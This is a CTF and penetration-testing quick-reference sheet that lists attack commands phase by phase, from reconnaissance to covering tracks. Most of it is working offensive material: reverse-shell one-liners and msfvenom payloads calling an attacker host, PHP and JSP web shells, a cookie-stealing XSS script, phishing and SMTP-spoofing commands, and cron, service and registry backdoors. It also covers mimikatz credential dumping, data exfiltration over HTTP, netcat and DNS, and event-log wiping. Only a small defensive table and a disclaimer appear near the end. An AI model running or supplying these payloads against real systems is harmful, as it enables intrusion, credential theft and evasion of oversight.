CTF Quick Reference Guide for Cybersecurity Professionals
Gather information about the target to identify vulnerabilities and potential entry points
# Whois lookup
whois target.com
# DNS enumeration
dig target.com ANY
nslookup target.com
host -a target.com
# Find subdomains
sublist3r -d target.com
amass enum -d target.com
subfinder -d target.com
# Google dorking examples
site:target.com
site:target.com filetype:pdf
site:target.com intitle:"index of"
# Shodan queries
shodan search "hostname:target.com"
shodan host 192.168.1.1
# Certificate transparency logs
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq .# Host discovery
nmap -sn 192.168.1.0/24
netdiscover -r 192.168.1.0/24
# Port scanning - TCP
nmap -sS -p- target.com # SYN scan all ports
nmap -sV -p 80,443,8080 target.com # Service version detection
nmap -A target.com # Aggressive scan
# Fast comprehensive scan
nmap -sS -sV -O -p- --min-rate=1000 target.com
# Script scanning
nmap --script vuln target.com
nmap --script=http-enum target.com# Directory/file brute forcing
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ffuf -u http://target.com/FUZZ -w wordlist.txt
# With extensions
gobuster dir -u http://target.com -w wordlist.txt -x php,html,txt,bak
# Web technology identification
whatweb target.com
nikto -h http://target.com
# CMS identification
wpscan --url http://target.com # WordPress# SMB enumeration
smbclient -L //target.com -N
smbmap -H target.com
enum4linux -a target.com
# User enumeration
crackmapexec smb target.com -u '' -p '' --users
# Null session
rpcclient -U "" target.com# SSH banner grabbing
nc target.com 22
# SNMP enumeration
snmpwalk -v 2c -c public target.com
onesixtyone -c community.txt target.com
# NFS shares
showmount -e target.comCreate malicious payload designed to exploit identified vulnerabilities
# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe -o payload.exe
# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f elf -o payload.elf
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f raw -o payload.php
# Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f raw -o payload.py# Encoded Windows payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 \
-e x86/shikata_ga_nai -i 10 -f exe -o encoded.exe
# PowerShell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f psh -o payload.ps1bash -i >& /dev/tcp/attacker_ip/4444 0>&1nc attacker_ip 4444 -e /bin/bashimport socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("attacker_ip",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])$client = New-Object System.Net.Sockets.TCPClient('attacker_ip',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$stream.Write($sendbyte,0,$sendbyte.Length);
};<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?><%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
%>Transmit the weaponized payload to the target environment
# Send phishing email with attachment
sendemail -f attacker@evil.com -t victim@target.com \
-u "Important: Account Security Alert" \
-m "Please review the attached document." \
-a malicious.pdf \
-s mail.evil.com:25
# Using swaks
swaks --to victim@target.com \
--from hr@target.com \
--header "Subject: Updated Company Policy" \
--body "Please review the attached policy." \
--attach malicious.docx# Simple SMTP spoofing
telnet mail.target.com 25
HELO attacker.com
MAIL FROM: ceo@target.com
RCPT TO: victim@target.com
DATA
Subject: Urgent Request
Please download and review: http://evil.com/report.pdf
.
QUIT# Simple HTTP server
python3 -m http.server 8080
python2 -m SimpleHTTPServer 8080
# PHP built-in server
php -S 0.0.0.0:8080
# WebDAV server
wsgidav --host=0.0.0.0 --port=8080 --root=/path/to/files<!-- Automatic download -->
<iframe src="http://attacker_ip/payload.exe" style="display:none;"></iframe>
<!-- HTML smuggling -->
<script>
var payload = atob('base64_encoded_payload');
var blob = new Blob([payload], {type: 'application/octet-stream'});
var url = window.URL.createObjectURL(blob);
var a = document.createElement('a');
a.href = url;
a.download = 'document.pdf';
a.click();
</script># Create SMB share
impacket-smbserver share /path/to/payloads -smb2support
# Access from Windows
\\attacker_ip\share\payload.exe
# MITM with Responder
responder -I eth0 -Pdv# Create evil twin AP
airbase-ng -e "Free_WiFi" -c 6 wlan0
# Captive portal with credential harvesting
wifiphisher -aI wlan0 -jI wlan1 -p firmware-upgradeExecute malicious code to gain initial access by exploiting vulnerabilities
-- Basic SQLi test
' OR '1'='1
' OR '1'='1' --
admin' --
-- Union-based SQLi
' UNION SELECT NULL--
' UNION SELECT username,password FROM users--
-- Time-based blind SQLi
' AND SLEEP(5)--
'; WAITFOR DELAY '00:00:05'-- (MSSQL)
-- SQLMap automated exploitation
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database --tables
sqlmap -u "http://target.com/page.php?id=1" --os-shell<!-- Reflected XSS -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<!-- Cookie stealing -->
<script>
new Image().src='http://attacker_ip/steal.php?c='+document.cookie;
</script># Basic LFI
http://target.com/page.php?file=../../../../etc/passwd
# PHP wrappers
http://target.com/page.php?file=php://filter/convert.base64-encode/resource=config.php
http://target.com/page.php?file=php://input # POST: <?php system($_GET['cmd']); ?>
# Log poisoning
http://target.com/page.php?file=../../../../var/log/apache2/access.log&cmd=whoami# Basic command injection
; whoami
| whoami
&& whoami
` whoami `
$(whoami)
# Reverse shell via command injection
; bash -i >& /dev/tcp/attacker_ip/4444 0>&1
; nc attacker_ip 4444 -e /bin/bash# EternalBlue (MS17-010)
use exploit/windows/smb/ms17_010_eternalblue
set RHOST target.com
set LHOST attacker_ip
exploit
# Pass-the-hash
pth-winexe -U administrator%hash //target.com cmd
crackmapexec smb target.com -u admin -H ntlm_hash
# RDP brute force
hydra -l administrator -P passwords.txt rdp://target.com# SSH brute force
hydra -l root -P rockyou.txt ssh://target.com
# Kernel exploits
searchsploit linux kernel 4.4.0
./dirtycow /etc/passwd
# SUID exploitation
find / -perm -4000 2>/dev/null
./suid_binaryEstablish persistence on the compromised system
# User crontab
(crontab -l; echo "*/5 * * * * /tmp/.hidden.sh") | crontab -
# System-wide cron
echo "*/10 * * * * root /tmp/.backdoor.sh" >> /etc/crontab# Create malicious service
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=System Update Service
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor.service# Add SSH public key
mkdir -p /root/.ssh
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys# Current User
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
# All Users
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"# Create scheduled task
schtasks /create /tn "Windows Update" /tr "C:\Windows\Temp\backdoor.exe" /sc onlogon /ru System
# PowerShell
$action = New-ScheduledTaskAction -Execute "C:\backdoor.exe"
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName "Backdoor" -Action $action -Trigger $trigger# Create Windows service
sc create "Update Service" binPath= "C:\backdoor.exe" start= auto
sc start "Update Service"<?php
// Simple backdoor
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
// Hidden backdoor with password
if(md5($_GET['pass']) == "5f4dcc3b5aa765d61d8327deb882cf99") {
eval($_POST['cmd']);
}
?>weevely generate password backdoor.php
weevely http://target.com/backdoor.php passwordEstablish remote communication channel for control
# Start msfconsole
msfconsole
# Set up listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit -j # Run as background job# System information
sysinfo
getuid
ps
# Privilege escalation
getsystem
run post/windows/gather/smart_hashdump
# Screenshot & Keylogging
screenshot
keyscan_start
keyscan_dump
# File operations
download C:\\important.txt
upload /tmp/backdoor.exe C:\\Windows\\Temp\\
# Network
ipconfig
route
portfwd add -l 3389 -p 3389 -r 127.0.0.1
# Persistence
run persistence -X -i 60 -p 4444 -r attacker_ip
# Shell
shell# Listener
nc -lvnp 4444
# Upgrade shell to TTY
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Full TTY upgrade
# On victim:
python -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z
# On attacker:
stty raw -echo; fg
# Press Enter twice
export TERM=xterm# Local port forward
ssh -L 8080:internal_server:80 user@jump_host
# Remote port forward
ssh -R 8080:localhost:80 user@external_server
# Dynamic port forward (SOCKS proxy)
ssh -D 9050 user@jump_host
proxychains nmap -sT internal_network# Server (on attacker)
chisel server -p 8000 --reverse
# Client (on victim)
chisel client attacker_ip:8000 R:1080:socks
chisel client attacker_ip:8000 R:8080:localhost:80
# Use SOCKS proxy
proxychains nmap -sT 192.168.1.0/24# Configure /etc/proxychains.conf
socks5 127.0.0.1 9050
# Use with tools
proxychains nmap -sT target_ip
proxychains firefox
proxychains ssh user@internal_hostAchieve the ultimate goal of the attack (data theft, disruption, etc.)
# Load mimikatz
.\mimikatz.exe
# Dump credentials from memory
sekurlsa::logonpasswords
# Dump NTLM hashes
lsadump::sam
# DCSync attack
lsadump::dcsync /domain:target.com /user:Administrator
# Kerberos tickets
sekurlsa::tickets
# Golden ticket
kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-xxx /krbtgt:[hash]# Extract SAM and SYSTEM
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# Crack offline
impacket-secretsdump -sam sam.save -system system.save LOCAL# Copy shadow file
cat /etc/shadow > /tmp/.shadow
# Crack with John
unshadow /etc/passwd /etc/shadow > hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Crack with Hashcat
hashcat -m 1800 -a 0 hashes.txt rockyou.txtfind / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
find /home -name "*.pem" 2>/dev/null# HTTP upload
curl -X POST -F "file=@sensitive.txt" http://attacker_ip/upload
# SCP
scp sensitive.txt user@attacker_ip:/tmp/
# Netcat
# On attacker:
nc -lvnp 4444 > exfil.zip
# On victim:
nc attacker_ip 4444 < sensitive.zip# Base64 encode and exfiltrate
base64 sensitive.txt | curl -X POST -d @- http://attacker_ip/receive
# Gzip and base64
tar czf - /etc | base64 | curl -X POST -d @- http://attacker_ip/receive# Manual DNS exfiltration
for line in $(cat secret.txt | base64); do
dig $line.attacker.com
done
# Automated DNS exfiltration
dnscat2 --dns server=attacker_ip,domain=attacker.com# PsExec
impacket-psexec administrator:password@target.com
PsExec.exe \\target.com -u administrator -p password cmd
# WMI
wmic /node:target.com /user:administrator process call create "cmd.exe"
# WinRM
Enter-PSSession -ComputerName target.com -Credential (Get-Credential)
Invoke-Command -ComputerName target.com -ScriptBlock { whoami }
# Pass-the-hash
impacket-psexec -hashes :ntlm_hash administrator@target.com# SSH
ssh user@target.com
ssh -i id_rsa user@target.com
# SSH key-based lateral movement
for host in $(cat hosts.txt); do
ssh -i id_rsa user@$host 'command'
done# Check sudo permissions
sudo -l
# GTFOBins exploitation
sudo /usr/bin/vim -c ':!/bin/bash'
sudo /usr/bin/find . -exec /bin/bash \; -quit
# Kernel exploits
./dirtycow /etc/passwd
# SUID binaries
find / -perm -4000 2>/dev/null# UAC bypass
use exploit/windows/local/bypassuac
# Token impersonation
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
# AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated# Clear event logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Disable logging
auditpol /set /category:* /success:disable /failure:disable# Clear bash history
history -c
echo > ~/.bash_history
rm ~/.bash_history
# Clear system logs
echo > /var/log/auth.log
echo > /var/log/syslog
# Clear specific log entries
sed -i '/attacker_ip/d' /var/log/apache2/access.logDetection and prevention techniques for each phase
| Phase | Detection Method | Tools/Techniques |
|---|---|---|
| Reconnaissance | Monitor for port scans, excessive DNS queries | IDS/IPS, SIEM, rate limiting |
| Weaponization | Antivirus, YARA rules | EDR, VirusTotal, sandboxing |
| Delivery | Email security, spam filtering | SEG, SPF/DKIM/DMARC |
| Exploitation | WAF, IDS signatures | ModSecurity, Snort, Suricata |
| Installation | File integrity monitoring | AIDE, Tripwire, Sysmon |
| Command & Control | Network traffic analysis | Zeek, Wireshark, JA3 fingerprinting |
| Actions | DLP, UBA, anomaly detection | SIEM correlation, behavior analytics |
# Isolate compromised system (Linux)
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
# Disable network adapter (Windows)
netsh interface set interface "Ethernet" admin=disable# Memory dump
dd if=/dev/mem of=memory.dump
# Disk imaging
dc3dd if=/dev/sda of=disk.img hash=md5 hash=sha256
# Network capture
tcpdump -i eth0 -w capture.pcap
# Analyze logs
grep -r "attacker_ip" /var/log/
journalctl -xe | grep suspiciousIMPORTANT: This guide is for educational purposes and authorized penetration testing only.
Misuse of these techniques may result in criminal prosecution, civil liability, loss of certifications, and damage to reputation.
Always get explicit written authorization before testing any system you do not own.
# Linux
/root/flag.txt
/home/*/flag.txt
/var/www/html/flag.txt
# Windows
C:\Users\Administrator\Desktop\flag.txt
C:\flag.txt
# Find flags
find / -name "*flag*" 2>/dev/null#!/bin/bash
TARGET=$1
# Port scan
nmap -sS -sV -O -p- -T4 $TARGET -oA nmap_scan
# Web enumeration
if grep -q "80/tcp.*open" nmap_scan.nmap; then
gobuster dir -u http://$TARGET -w wordlist.txt
fi
# SMB enumeration
if grep -q "445/tcp.*open" nmap_scan.nmap; then
enum4linux -a $TARGET
fi